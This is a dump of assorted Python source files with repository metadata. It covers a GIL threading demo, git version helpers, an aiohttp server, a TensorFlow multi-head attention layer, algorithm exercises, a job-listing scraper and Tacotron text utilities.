code params = phone + ',' + code msg = self.sms_heard + u"您好!验证码是:{$var}" print self.account print self.account datas = { 'account': self.account, 'password': self.password, 'msg': msg, 'params': params } send_result = self.send_post(datas, self.host_sign, sms_send_uri) print send_result if not send_result: return False else: sort_data = json.loads(send_result) print sort_data if int(sort_data["code"]) == 0: return code else: raise UserError(_(sort_data['errorMsg']))
0961c7df4a2719e2dfeeece2c5a57cf3f59e263c
2cb507ecd6629b9ff457a36e462f987913d94c1a
/python核心技术与实战/23/gil.py
f3ccf2898fadf6e776549b48a927183257a39720
[ "Apache-2.0" ]
permissive
youaresherlock/PythonPractice
6869e0a5949675198826e5a07552237a636d6f5b
2e22d3fdcb26353cb0d8215c150e84d11bc9a022
refs/heads/master
2021-08-16T03:09:44.203035
2021-08-02T07:40:00
2021-08-02T07:40:00
146,625,560
0
1
null
null
null
null
UTF-8
Python
false
false
1,159
py
#!usr/bin/python # -*- coding:utf8 -*- import time from threading import Thread import sys import threading # 单线程版 def CountDown(n): while n > 0: n -= 1 if __name__ == "__main__": n = 3000000 start_time = time.perf_counter() CountDown(n) end_time = time.perf_counter() print("n = {},单线程版耗时{}".format(n, end_time-start_time)) # 多线程版 start_time = time.perf_counter() t1 = Thread(target=CountDown, args = [n//2]) t2 = Thread(target=CountDown, args = [n//2]) t1.start() t2.start() t1.join() t2.join() end_time = time.perf_counter() print("n = {},多线程版耗时{}".format(n, end_time-start_time)) # 对象引用计数 for k in range(100): a = [] b = a print(sys.getrefcount(a)) # 线程安全 n = 0 def foo(): global n n += 1 threads = [] for i in range(100): t = threading.Thread(target=foo) threads.append(t) for t in threads: t.start() for t in threads: t.join() print(n)
58ce61b7f582ce7941345cabdd91cbb99c06692c
78ee2d20722287f547c406a1cff1efc36d020ba3
/flare_portal/versioning.py
b5ae7e3705b2d24587dd22d5d6233ad8eded23e8
[ "MIT" ]
permissive
flare-kcl/flare-portal
db660b4ccc39a6f125d548fc9efb21026f097563
a1cef9d22ba3f1bafac55bb6ee1c8223425101dd
refs/heads/main
2023-07-24T10:00:27.807734
2022-07-19T02:08:38
2022-07-19T02:08:38
305,943,258
1
2
MIT
2023-07-03T14:40:33
2020-10-21T07:30:12
Python
UTF-8
Python
false
false
2,608
py
"""Provides functions to fetch versions from Git Copied from Raven Python https://github.com/getsentry/raven-python/blob/d7d14f61b7fb425bcb15512f659626648c494f98/raven/utils/compat.py """ import os.path class InvalidGitRepository(Exception): pass def fetch_git_sha(path: str, head: str = None) -> str: """ >>> fetch_git_sha(os.path.dirname(__file__)) """ if not head: head_path = os.path.join(path, ".git", "HEAD") if not os.path.exists(head_path): raise InvalidGitRepository( "Cannot identify HEAD for git repository at %s" % (path,) ) with open(head_path, "r") as fp: head = str(fp.read()).strip() if head.startswith("ref: "): head = head[5:] revision_file = os.path.join(path, ".git", *head.split("/")) else: return head else: revision_file = os.path.join(path, ".git", "refs", "heads", head) if not os.path.exists(revision_file): if not os.path.exists(os.path.join(path, ".git")): raise InvalidGitRepository( "%s does not seem to be the root of a git repository" % (path,) ) # Check for our .git/packed-refs' file since a `git gc` may have run # https://git-scm.com/book/en/v2/Git-Internals-Maintenance-and-Data-Recovery packed_file = os.path.join(path, ".git", "packed-refs") if os.path.exists(packed_file): with open(packed_file) as fh: for line in fh: line = line.rstrip() if line and line[:1] not in ("#", "^"): try: revision, ref = line.split(" ", 1) except ValueError: continue if ref == head: return str(revision) raise InvalidGitRepository( 'Unable to find ref to head "%s" in repository' % (head,) ) with open(revision_file) as fh: return str(fh.read()).strip() def fetch_package_version(dist_name: str) -> str: """ >>> fetch_package_version('sentry') """ try: # Importing pkg_resources can be slow, so only import it # if we need it. import pkg_resources except ImportError: # pkg_resource is not available on Google App Engine raise NotImplementedError( "pkg_resources is not available " "on this Python install" ) dist = pkg_resources.get_distribution(dist_name) return dist.version
ea5d5e55d54477a28c3d0d03081e37950effcb73
ca17adac27ce0fc199a111db0e786bdbfd24f849
/02-asyncio-basic/e02-http-server.py
fa21cd3155f88612807884c45b0db4c6eeb30ad7
[]
no_license
genzj/asyncio-training-course
862c1edb19bd3d25cb8a927fdb9942a9838c8d80
34e72a51f79945709fbd496391295e7cd92ec8e1
refs/heads/master
2023-08-08T05:25:01.438483
2023-07-17T08:53:59
2023-07-17T08:59:14
150,000,887
1
2
null
2023-07-25T23:36:11
2018-09-23T16:05:10
Python
UTF-8
Python
false
false
353
py
# -*- encoding: utf-8 -*- from aiohttp import web async def handle(request): name = request.match_info.get('name', "Anonymous") text = "Hello, " + name return web.Response(text=text) app = web.Application() app.add_routes([web.get('/', handle), web.get('/{name}', handle)]) web.run_app(app, host='127.0.0.1', port=5000)
58f4c40eb8c52f99c0002350e82dc95a31f3baa3
180dc578d12fff056fce1ef8bd1ba5c227f82afc
/official/legacy/transformer/attention_layer.py
fcdce774b03f1b27cdf8350104946a44372bf458
[ "Apache-2.0" ]
permissive
jianzhnie/models
6cb96c873d7d251db17afac7144c4dbb84d4f1d6
d3507b550a3ade40cade60a79eb5b8978b56c7ae
refs/heads/master
2023-07-12T05:08:23.314636
2023-06-27T07:54:20
2023-06-27T07:54:20
281,858,258
2
0
Apache-2.0
2022-03-27T12:53:44
2020-07-23T05:22:33
Python
UTF-8
Python
false
false
7,119
py
# Copyright 2023 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Implementation of multiheaded attention and self-attention layers.""" import math import tensorflow as tf from official.modeling import tf_utils class Attention(tf.keras.layers.Layer): """Multi-headed attention layer.""" def __init__(self, hidden_size, num_heads, attention_dropout): """Initialize Attention. Args: hidden_size: int, output dim of hidden layer. num_heads: int, number of heads to repeat the same attention structure. attention_dropout: float, dropout rate inside attention for training. """ if hidden_size % num_heads: raise ValueError( "Hidden size ({}) must be divisible by the number of heads ({})." .format(hidden_size, num_heads)) super(Attention, self).__init__() self.hidden_size = hidden_size self.num_heads = num_heads self.attention_dropout = attention_dropout def build(self, input_shape): """Builds the layer.""" # Layers for linearly projecting the queries, keys, and values. size_per_head = self.hidden_size // self.num_heads def _glorot_initializer(fan_in, fan_out): limit = math.sqrt(6.0 / (fan_in + fan_out)) return tf.keras.initializers.RandomUniform(minval=-limit, maxval=limit) attention_initializer = _glorot_initializer(input_shape.as_list()[-1], self.hidden_size) self.query_dense_layer = tf.keras.layers.EinsumDense( "BTE,ENH->BTNH", output_shape=(None, self.num_heads, size_per_head), kernel_initializer=tf_utils.clone_initializer(attention_initializer), bias_axes=None, name="query") self.key_dense_layer = tf.keras.layers.EinsumDense( "BTE,ENH->BTNH", output_shape=(None, self.num_heads, size_per_head), kernel_initializer=tf_utils.clone_initializer(attention_initializer), bias_axes=None, name="key") self.value_dense_layer = tf.keras.layers.EinsumDense( "BTE,ENH->BTNH", output_shape=(None, self.num_heads, size_per_head), kernel_initializer=tf_utils.clone_initializer(attention_initializer), bias_axes=None, name="value") output_initializer = _glorot_initializer(self.hidden_size, self.hidden_size) self.output_dense_layer = tf.keras.layers.EinsumDense( "BTNH,NHE->BTE", output_shape=(None, self.hidden_size), kernel_initializer=output_initializer, bias_axes=None, name="output_transform") super(Attention, self).build(input_shape) def get_config(self): return { "hidden_size": self.hidden_size, "num_heads": self.num_heads, "attention_dropout": self.attention_dropout, } def call(self, query_input, source_input, bias, training, cache=None, decode_loop_step=None): """Apply attention mechanism to query_input and source_input. Args: query_input: A tensor with shape [batch_size, length_query, hidden_size]. source_input: A tensor with shape [batch_size, length_source, hidden_size]. bias: A tensor with shape [batch_size, 1, length_query, length_source], the attention bias that will be added to the result of the dot product. training: A bool, whether in training mode or not. cache: (Used during prediction) A dictionary with tensors containing results of previous attentions. The dictionary must have the items: {"k": tensor with shape [batch_size, i, heads, dim_per_head], "v": tensor with shape [batch_size, i, heads, dim_per_head]} where i is the current decoded length for non-padded decode, or max sequence length for padded decode. decode_loop_step: An integer, step number of the decoding loop. Used only for autoregressive inference on TPU. Returns: Attention layer output with shape [batch_size, length_query, hidden_size] """ # Linearly project the query, key and value using different learned # projections. Splitting heads is automatically done during the linear # projections --> [batch_size, length, num_heads, dim_per_head]. query = self.query_dense_layer(query_input) key = self.key_dense_layer(source_input) value = self.value_dense_layer(source_input) if cache is not None: # Combine cached keys and values with new keys and values. if decode_loop_step is not None: cache_k_shape = cache["k"].shape.as_list() indices = tf.reshape( tf.one_hot(decode_loop_step, cache_k_shape[1], dtype=key.dtype), [1, cache_k_shape[1], 1, 1]) key = cache["k"] + key * indices cache_v_shape = cache["v"].shape.as_list() indices = tf.reshape( tf.one_hot(decode_loop_step, cache_v_shape[1], dtype=value.dtype), [1, cache_v_shape[1], 1, 1]) value = cache["v"] + value * indices else: key = tf.concat([tf.cast(cache["k"], key.dtype), key], axis=1) value = tf.concat([tf.cast(cache["v"], value.dtype), value], axis=1) # Update cache cache["k"] = key cache["v"] = value # Scale query to prevent the dot product between query and key from growing # too large. depth = (self.hidden_size // self.num_heads) query *= depth**-0.5 # Calculate dot product attention logits = tf.einsum("BTNH,BFNH->BNFT", key, query) logits += bias # Note that softmax internally performs math operations using float32 # for numeric stability. When training with float16, we keep the input # and output in float16 for better performance. weights = tf.nn.softmax(logits, name="attention_weights") if training: weights = tf.nn.dropout(weights, rate=self.attention_dropout) attention_output = tf.einsum("BNFT,BTNH->BFNH", weights, value) # Run the outputs through another linear projection layer. Recombining heads # is automatically done --> [batch_size, length, hidden_size] attention_output = self.output_dense_layer(attention_output) return attention_output class SelfAttention(Attention): """Multiheaded self-attention layer.""" def call(self, query_input, bias, training, cache=None, decode_loop_step=None): return super(SelfAttention, self).call(query_input, query_input, bias, training, cache, decode_loop_step)
79700ce48d4aacbecddc068d807ecf3f56d9dc9c
c7a1470d2f6a15265e1f884c86439dc6d98b4484
/LintCode/trie/0442_Implement_Trie_(Prefix_Tree).py
7a674f32a78d465c8b92d461ef3d7d86a6c3d96c
[]
no_license
GuanYangCLU/AlgoTestForPython
5239774fb6c840f3d65c4e4290ce8125fe8c94d3
dddbc8115f69dec636c62c755f02905c469155e0
refs/heads/master
2022-01-19T15:03:54.835403
2021-12-30T02:19:37
2021-12-30T02:19:37
122,312,195
2
1
null
null
null
null
UTF-8
Python
false
false
1,196
py
class TrieNode: def __init__(self): self.children = {} self.isWord = False class Trie: def __init__(self): # do intialization if necessary self.root = TrieNode() """ @param: word: a word @return: nothing """ def insert(self, word): # write your code here node = self.root for c in word: if c not in node.children: node.children[c] = TrieNode() node = node.children[c] node.isWord = True def find(self, word): node = self.root for c in word: if c not in node.children: return None node = node.children[c] return node """ @param: word: A string @return: if the word is in the trie. """ def search(self, word): # write your code here res = self.find(word) return False if not res else res.isWord """ @param: prefix: A string @return: if there is any word in the trie that starts with the given prefix. """ def startsWith(self, prefix): # write your code here return self.find(prefix) is not None
462ac9a85d6bc6fb7b67357293dc32fc8f1a8490
0f9c9e4c60f28aa00aff8b80e1e4c142c61d24ce
/Python/LeetCode/102_binary_tree_level_order_traversal.py
9bf5ae9c253e87223e6611d5901e3a0a777bd81d
[]
no_license
shouliang/Development
c56fcc69e658393c138b63b507b96c48232128d5
b7e3b02c50d54515e584cb18dff83109224245d0
refs/heads/master
2020-03-22T09:14:51.070228
2019-08-29T02:50:26
2019-08-29T02:50:26
139,825,052
0
0
null
null
null
null
UTF-8
Python
false
false
2,498
py
''' 二叉树按层次遍历 102. Binary Tree Level Order Traversal:https://leetcode.com/problems/binary-tree-level-order-traversal/ 思路: 使用队列这种数据结构:首先根节点进入队列,然后在队列头部弹出节点的同时,将其左右分支依次插入队列的尾部, 直至队列为空 其实这就是图的bfs,但是二叉树就是一种特殊的图 ''' # Definition for a binary tree node. class TreeNode(object): def __init__(self, x): self.val = x self.left = None self.right = None class Solution(object): def levelOrder(self, root): """ :type root: TreeNode :rtype: List[List[int]] """ if not root: return [] result = [] queue = [] # 队列 queue.append(root) # 根节点进入队列 while queue: cur_level = [] level_size = len(queue) for _ in range(level_size): # 遍历当前层,处理完当前层,再将当前层的一维数组加入到二维结果中 node = queue.pop(0) # 在队列头部弹出节点的同时,将其左右分支依次append()到队列的尾部 cur_level.append(node.val) if node.left: queue.append(node.left) if node.right: queue.append(node.right) result.append(cur_level) return result class Solution2(object): def levelOrder(self, root): """ :type root: TreeNode :rtype: List[List[int]] """ if not root: return [] result = [] queue = [] # 队列 queue.append(root) # 根节点进入队列 while queue: node = queue.pop(0) # 在队列头部弹出节点的同时,将其左右分支依次append()到队列的尾部 result.append(node.val) # 处理结点,访问其相邻的节点并进入队列 if node.left: queue.append(node.left) if node.right: queue.append(node.right) return result s = Solution() root = TreeNode(3) treeNode1 = TreeNode(9) treeNode2 = TreeNode(20) root.left = treeNode1 root.right = treeNode2 treeNode3 = TreeNode(15) treeNode4 = TreeNode(7) treeNode2.left = treeNode3 treeNode2.right = treeNode4 ret = s.levelOrder(root) print(ret) s2 = Solution2() ret = s2.levelOrder(root) print(ret)
[ "[email protected]:node/hunqing.git" ]
[email protected]:node/hunqing.git
3703f80c8a35f44e25ab5acfc87a2c94b2001201
876de904572c611b8cbad21f50877cdc812f2946
/Leetcode/529. 扫雷游戏.py
3e649e9aaf806904b938e610485bcf270d5df164
[ "MIT" ]
permissive
QDylan/Learning-
66a33de0e15f26672fb63c0b393866721def27ae
f09e0aa3de081883b4a7ebfe4d31b5f86f24b64f
refs/heads/master
2023-02-08T02:34:26.616116
2020-12-25T05:02:32
2020-12-25T05:02:32
263,805,536
0
0
null
null
null
null
UTF-8
Python
false
false
4,152
py
# -*- coding: utf-8 -*- """ @Time : 2020/8/20 10:17 @Author : QDY @FileName: 529. 扫雷游戏.py @Software: PyCharm """ """ 让我们一起来玩扫雷游戏! 给定一个代表游戏板的二维字符矩阵。'M'代表一个未挖出的地雷,'E'代表一个未挖出的空方块, 'B'代表没有相邻(上,下,左,右,和所有4个对角线)地雷的已挖出的空白方块, 数字('1' 到 '8')表示有多少地雷与这块已挖出的方块相邻,'X'则表示一个已挖出的地雷。 现在给出在所有未挖出的方块中('M'或者'E')的下一个点击位置(行和列索引),根据以下规则,返回相应位置被点击后对应的面板: 如果一个地雷('M')被挖出,游戏就结束了- 把它改为'X'。 如果一个没有相邻地雷的空方块('E')被挖出,修改它为('B'),并且所有和其相邻的未挖出方块都应该被递归地揭露。 如果一个至少与一个地雷相邻的空方块('E')被挖出,修改它为数字('1'到'8'),表示相邻地雷的数量。 如果在此次点击中,若无更多方块可被揭露,则返回面板。 示例 1: 输入: [['E', 'E', 'E', 'E', 'E'], ['E', 'E', 'M', 'E', 'E'], ['E', 'E', 'E', 'E', 'E'], ['E', 'E', 'E', 'E', 'E']] Click : [3,0] 输出: [['B', '1', 'E', '1', 'B'], ['B', '1', 'M', '1', 'B'], ['B', '1', '1', '1', 'B'], ['B', 'B', 'B', 'B', 'B']] 解释: 示例 2: 输入: [['B', '1', 'E', '1', 'B'], ['B', '1', 'M', '1', 'B'], ['B', '1', '1', '1', 'B'], ['B', 'B', 'B', 'B', 'B']] Click : [1,2] 输出: [['B', '1', 'E', '1', 'B'], ['B', '1', 'X', '1', 'B'], ['B', '1', '1', '1', 'B'], ['B', 'B', 'B', 'B', 'B']] 解释: 注意: 输入矩阵的宽和高的范围为 [1,50]。 点击的位置只能是未被挖出的方块 ('M' 或者 'E'),这也意味着面板至少包含一个可点击的方块。 输入面板不会是游戏结束的状态(即有地雷已被挖出)。 简单起见,未提及的规则在这个问题中可被忽略。例如,当游戏结束时你不需要挖出所有地雷,考虑所有你可能赢得游戏或标记方块的情况。 """ from collections import deque class Solution: def updateBoard(self, board, click): if board[click[0]][click[1]] == 'M': board[click[0]][click[1]] = 'X' return board h, w = len(board), len(board[0]) def mine_count(x, y): res = 0 for dx in (-1, 1, 0): for dy in (-1, 1, 0): if 0 <= x + dx < h and 0 <= y + dy < w and board[x + dx][y + dy] in ('M', 'X'): res += 1 return res def dfs(x, y): board[x][y] = mine_count(x, y) if board[x][y] == 0: board[x][y] = 'B' for dx in (-1, 1, 0): for dy in (-1, 1, 0): nxt_x, nxt_y = x + dx, y + dy if 0 <= nxt_x < h and 0 <= nxt_y < w and board[nxt_x][nxt_y] == 'E': dfs(nxt_x, nxt_y) else: board[x][y] = str(board[x][y]) # dfs(click[0],click[1]) q = deque([(click[0], click[1])]) while q: length = len(q) for i in range(length): x, y = q.popleft() board[x][y] = mine_count(x, y) if board[x][y] == 0: board[x][y] = 'B' for dx in (-1, 1, 0): for dy in (-1, 1, 0): nxt_x, nxt_y = x + dx, y + dy if 0 <= nxt_x < h and 0 <= nxt_y < w and board[nxt_x][nxt_y] == 'E': q.append((nxt_x, nxt_y)) board[nxt_x][nxt_y] = 'B' else: board[x][y] = str(board[x][y]) return board
a3a216ba5eb2add7fd1e92e28f32ec90873d2f02
f7d4993c3f9d840b3505e82567e673de00d91afc
/Code/rearrange.py
95a3ffe7b898c2f242d8bb2a8905229d5b2251a6
[]
no_license
Andre-Williams22/CS-1.2-Intro-Data-Structures
026bb08c219ffcb7bafe43d3ea8426f821d6bc5c
a9effc2257a539456688c408ec4ae9e4d4d67e11
refs/heads/master
2022-12-10T00:12:31.879273
2019-12-12T07:10:33
2019-12-12T07:10:33
216,670,821
0
0
null
2022-09-23T22:30:43
2019-10-21T21:44:10
Python
UTF-8
Python
false
false
1,080
py
import random import sys # a = input('please type a word: ') # b = input('please type a word: ') # c = input('please type a word: ') # d = input('please type a word: ') # e = input('please type a word: ') # words = [] # words.append(a) # words.append(b) # words.append(c) # words.append(d) # words.append(e) # print ("The list before shuffling is : ", end="") # for i in range(0, len(words)): # print(words[i], end=" ") # print("\r") # random.shuffle(words) # print(random.choice(words)) # # Printing list after shuffling # print ("The list after shuffling is : ", end="") # for i in range(0, len(words)): # print (words[i], end=" ") # print("\r") def rearrange(words): result = [] for i in range(len(words)): word = random.choice(words) result.append(word) words.remove(word) result = result [:-1] return(result) def reverse(words): new_list = words[::-1] print(new_list) if __name__ == '__main__': words = list(sys.argv[1:]) temp = rearrange(words) print(temp) print(reverse(temp))
85d6d96659e6ab8df9179e891d05df56649e2e6d
a8062308fb3bf6c8952257504a50c3e97d801294
/problems/N431_Encode_Nary_Tree_To_Binary_Tree.py
29be7e11dec99008b385e8fc593469702e866409
[]
no_license
wan-catherine/Leetcode
650d697a873ad23c0b64d08ad525bf9fcdb62b1b
238995bd23c8a6c40c6035890e94baa2473d4bbc
refs/heads/master
2023-09-01T00:56:27.677230
2023-08-31T00:49:31
2023-08-31T00:49:31
143,770,000
5
0
null
null
null
null
UTF-8
Python
false
false
1,213
py
""" For any node in the N_ary tree: his first child to Binary Tree's left child all other children will be this first child(left child of BT)'s right child. """ class Node: def __init__(self, val=None, children=None): self.val = val self.children = children class TreeNode: def __init__(self, x): self.val = x self.left = None self.right = None class Codec: def encode(self, root): """Encodes an n-ary tree to a binary tree. :type root: Node :rtype: TreeNode """ if not root: return t = TreeNode(root.val) if root.children: t.left = self.encode(root.children[0]) cur = t.left for node in root.children[1:]: cur.right = self.encode(node) cur = cur.right return t def decode(self, data): """Decodes your binary tree to an n-ary tree. :type data: TreeNode :rtype: Node """ if not data: return root = Node(data.val, []) cur = data.left while cur: root.children.append(self.decode(cur)) cur = cur.right return root
88d3dd854018f601e7960c53e13223c135447a52
9db281fbed35bb8384eeacaa81d1a32a9dcc5cca
/class-17/demo/monster-jobs/monster_jobs/scraper.py
0bb9e23c6da0da5a1287792a996e2dcec15b38c1
[]
no_license
corey-marchand/seattle-python-401d14
aab3f48c82229f1958989ce8318de60b9abbe4e2
ae9ffebc9e5250cb5ec1760fd7764da0d3ad4e4c
refs/heads/master
2022-11-15T16:09:37.248530
2020-07-09T19:10:49
2020-07-09T19:10:49
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,355
py
import requests from bs4 import BeautifulSoup # Send a request to Monster webpage URL = 'https://www.monster.com/jobs/search/?q=software-engineer&where=Seattle__2C-WA' response = requests.get(URL) # print(dir(response)) # Extract content content = response.content # Convert to BS object soup = BeautifulSoup(content, 'html.parser') # Find an element results = soup.find(id='SearchResults') # print(results.prettify()) jobs_list = results.find_all('section', class_='card-content') # print(len(jobs_list)) final_results = [] for job in jobs_list: job_dict = {'title': '', 'location':'', 'company':''} found_title = job.find('h2', class_='title') if found_title: title = found_title.text.strip() job_dict['title'] = title found_location = job.find('div', class_='location') if found_location: location = found_location.text.strip() job_dict['location'] = location found_company = job.find('div', class_='company') if found_company: company = found_company.text.strip() job_dict['company'] = company final_results.append(job_dict) # print(title) # print('********************************') # print(location) # print('********************************') # print(company) # print('\n ############################# \n') print(final_results)
5397b361705d553e3e3310f32c847b29f535c167
60d5ea4f007d49768d250ef394003f554003e4d0
/python/Depth-first Search/116.Populating Next Right Pointers in Each Node.py
885f028bc97eeb83c99f1867befd8577674b88a1
[]
no_license
EvanJamesMG/Leetcode
dd7771beb119ea1250dbb3b147a09053298cd63b
fa638c7fda3802e9f4e0751a2c4c084edf09a441
refs/heads/master
2021-01-10T17:11:10.896393
2017-12-01T16:04:44
2017-12-01T16:04:44
46,968,756
5
1
null
null
null
null
UTF-8
Python
false
false
1,655
py
# coding=utf-8 ''' Given a binary tree struct TreeLinkNode { TreeLinkNode *left; TreeLinkNode *right; TreeLinkNode *next; } Populate each next pointer to point to its next right node. If there is no next right node, the next pointer should be set to NULL. Initially, all next pointers are set to NULL. Note: You may only use constant extra space. You may assume that it is a perfect binary tree (ie, all leaves are at the same level, and every parent has two children). For example, Given the following perfect binary tree, 1 / \ 2 3 / \ / \ 4 5 6 7 After calling your function, the tree should look like: 1 -> NULL / \ 2 -> 3 -> NULL / \ / \ 4->5->6->7 -> NULL ''' # Definition for singly-linked list. ''' 深度优先搜索 ''' class TreeNode(object): def __init__(self, x): self.val = x self.left = None self.right = None class ListNode(object): def __init__(self, x): self.val = x self.next = None ''' 一个递归就搞定了,就是递归让每一个节点他的左右子树通过next链接,直至到最后一层, 然后递归左右节点,继续让他们的左右子树通过next链接。 ''' class Solution(object): def connect(self, root): """ :type root: TreeLinkNode :rtype: nothing """ if root: LR = root.left RL = root.right while LR and RL: LR.next = RL LR = LR.right RL = RL.left self.connect(root.left) self.connect(root.right)
83aafba4187bb26dfef831f2cb3ecf91c7677d01
04dddbf04893913b0b24c6c02ebd2672b774a616
/다이나믹 프로그래밍/11052 카드 구매하기.py
565e7ec0c89ae6471533ed01d0209c88d36b7020
[]
no_license
hatssww/BOJ
ca16345dbe24641e1ca5adee136a858a64a080b0
bd7363d5c84de281de9b34667e9c0b76a904cffc
refs/heads/main
2023-05-24T22:23:35.127397
2021-06-08T23:36:40
2021-06-08T23:36:40
370,254,375
0
1
null
null
null
null
UTF-8
Python
false
false
264
py
import sys n = int(sys.stdin.readline()) p = [0] + list(map(int, sys.stdin.readline().split())) d = [0] * (n + 1) d[1] = p[1] for i in range(2, n + 1): for j in range(1, i + 1): if d[i] < d[i - j] + p[j]: d[i] = d[i - j] + p[j] print(d[n])
810c374d5845fa02cb9141659fad67f933c09195
3abe7b4d572ae81a8222996821569bf3a684ec14
/text/__init__.py
e9461d87f13166dac13aea90ab80aead3a0ef212
[ "BSD-3-Clause", "MIT" ]
permissive
creotiv/RussianTTS-Tacotron2
6c8defdd5a9cafdd46b71f8006162c4bab586d0f
8ac15eea9450d141cb84d4d1a96b600f43d206c9
refs/heads/master
2023-06-01T09:43:12.209652
2021-06-10T12:54:24
2021-06-10T12:54:24
334,964,314
13
0
null
null
null
null
UTF-8
Python
false
false
2,385
py
""" from https://github.com/keithito/tacotron """ import re from text import cleaners from text.symbols import symbols, ctc_symbols # Mappings from symbol to numeric ID and vice versa: symbol_to_id = {s: i for i, s in enumerate(symbols)} _id_to_symbol = {i: s for i, s in enumerate(symbols)} _ctc_symbole_to_id = {s: i for i, s in enumerate(ctc_symbols)} # Regular expression matching text enclosed in curly braces: _curly_re = re.compile(r'(.*?)\{(.+?)\}(.*)') def text_to_sequence(text, cleaner_names): '''Converts a string of text to a sequence of IDs corresponding to the symbols in the text. The text can optionally have ARPAbet sequences enclosed in curly braces embedded in it. For example, "Turn left on {HH AW1 S S T AH0 N} Street." Args: text: string to convert to a sequence cleaner_names: names of the cleaner functions to run the text through Returns: List of integers corresponding to the symbols in the text ''' sequence = [] # Check for curly braces and treat their contents as ARPAbet: while len(text): m = _curly_re.match(text) if not m: sequence += _symbols_to_sequence(_clean_text(text, cleaner_names)) break sequence += _symbols_to_sequence(_clean_text(m.group(1), cleaner_names)) sequence += _arpabet_to_sequence(m.group(2)) text = m.group(3) return sequence def sequence_to_ctc_sequence(sequence): return [_ctc_symbole_to_id[_id_to_symbol[s]] for s in sequence if _id_to_symbol[s] in ctc_symbols] def sequence_to_text(sequence): '''Converts a sequence of IDs back to a string''' result = '' for symbol_id in sequence: if symbol_id in _id_to_symbol: s = _id_to_symbol[symbol_id] # Enclose ARPAbet back in curly braces: if len(s) > 1 and s[0] == '@': s = '{%s}' % s[1:] result += s return result.replace('}{', ' ') def _clean_text(text, cleaner_names): for name in cleaner_names: cleaner = getattr(cleaners, name) if not cleaner: raise Exception('Unknown cleaner: %s' % name) text = cleaner(text) return text def _symbols_to_sequence(symbols): return [symbol_to_id[s] for s in symbols if _should_keep_symbol(s)] def _arpabet_to_sequence(text): return _symbols_to_sequence(['@' + s for s in text.split()]) def _should_keep_symbol(s): return s in symbol_to_id and s is not '_' and s is not '~'
a0af01108c13fc966f89021c5c91150515e97d0d
b9c9215eb12ab8f0dcc4a5d964dc97ac2ad62257
/supervised_learning/0x11-attention/6-multihead_attention.py
76729225e985b407847cb68ae5dc2a513672b6cb
[]
no_license
AndrewMiranda/holbertonschool-machine_learning-1
0318c2f45c863721b478acae26a5a874290e6445
e8a98d85b3bfd5665cb04bec9ee8c3eb23d6bd58
refs/heads/main
2023-01-19T00:34:15.264705
2022-07-25T15:10:43
2022-07-25T15:10:43
386,514,270
0
0
null
2021-07-16T04:58:08
2021-07-16T04:58:07
null
UTF-8
Python
false
false
3,218
py
#!/usr/bin/env python3 """File that conatins the class MultiHeadAttention""" import tensorflow as tf sdp_attention = __import__('5-sdp_attention').sdp_attention class MultiHeadAttention(tf.keras.layers.Layer): """Class that perform multi head attention""" def __init__(self, dm, h): """ Class constructor dm is an integer representing the dimensionality of the model h is an integer representing the number of heads dm is divisible by h Sets the following public instance attributes: h - the number of heads dm - the dimensionality of the model depth - the depth of each attention head Wq - a Dense layer with dm units, used to generate the query matrix Wk - a Dense layer with dm units, used to generate the key matrix Wv - a Dense layer with dm units, used to generate the value matrix linear - a Dense layer with dm units, used to generate the attention output """ self.h = h self.dm = dm self.depth = dm // h self.Wq = tf.keras.layers.Dense(units=dm) self.Wk = tf.keras.layers.Dense(units=dm) self.Wv = tf.keras.layers.Dense(units=dm) self.linear = tf.keras.layers.Dense(units=dm) super(MultiHeadAttention, self).__init__() def call(self, Q, K, V, mask): """ Publci instance method Args: Q is a tensor of shape (batch, seq_len_q, dk) containing the input to generate the query matrix K is a tensor of shape (batch, seq_len_v, dk) containing the input to generate the key matrix V is a tensor of shape (batch, seq_len_v, dv) containing the input to generate the value matrix mask is always None Returns: output, weights outputa tensor with its last two dimensions as (..., seq_len_q, dm) containing the scaled dot product attention weights a tensor with its last three dimensions as (..., h, seq_len_q, seq_len_v) containing the attention weights """ def split_heads(x, batch_size): """Split the last dimension into (num_heads, depth). Transpose the result such that the shape is (batch_size, num_heads, seq_len, depth)""" x = tf.reshape(x, (batch_size, -1, self.h, self.depth)) return tf.transpose(x, perm=[0, 2, 1, 3]) batch_size = tf.shape(Q)[0] q = self.Wq(Q) # (batch_size, seq_len, d_model) k = self.Wk(K) # (batch_size, seq_len, d_model) v = self.Wv(V) # (batch_size, seq_len, d_model) q = split_heads(q, batch_size) k = split_heads(k, batch_size) v = split_heads(v, batch_size) scaled_attention, attention_weights = sdp_attention(q, k, v, mask) scaled_attention = tf.transpose(scaled_attention, perm=[0, 2, 1, 3]) concat_attention = tf.reshape(scaled_attention, (batch_size, -1, self.dm)) output = self.linear(concat_attention) return output, attention_weights
0c24daedded2881c22f5beb167c8ee8b0efba4f0
de24f83a5e3768a2638ebcf13cbe717e75740168
/moodledata/vpl_data/55/usersdata/112/23295/submittedfiles/av2_p3_civil.py
190a7d9f68a0de2937c3818addab0a1181fc2f81
[]
no_license
rafaelperazzo/programacao-web
95643423a35c44613b0f64bed05bd34780fe2436
170dd5440afb9ee68a973f3de13a99aa4c735d79
refs/heads/master
2021-01-12T14:06:25.773146
2017-12-22T16:05:45
2017-12-22T16:05:45
69,566,344
0
0
null
null
null
null
UTF-8
Python
false
false
822
py
# -*- coding: utf-8 -*- from __future__ import division import numpy as np linhas=input('Digite a quandidade de linhas:') a=np.zeros((linhas,linhas)) for i in range (0,a.shape[0],1): for j in range(0,a.shape[1],1): a[i,j]=input('Digite o termo:') print a x=input('Digite a coordenada x da localização da torre:') y=input('Digite a coordenada y da localização da torre:') def locali(a): for i in range (0,a.shape[0],1): for j in range (0,a.shape[1],1): a[x,y] return a[x,y] print locali(a) def soma_linha(a): s=[] for i in range (0,a.shape[0],1): soma=0 for j in range (0,a.shape[1],1): soma=soma+a[i,j] s.append(soma) for r in range(0,len(s),1): c=s[y] return c print soma_linha(a)
3d753eee73c94b858c52d1e6d561825f5839fb8d
a70697ef62978117467695fd3507e4d08e186ab4
/source/res/scripts/client/gui/scaleform/daapi/view/lobby/server_events/events_helpers.py
339785d042db63990f89e8ea039173f16cc705a1
[]
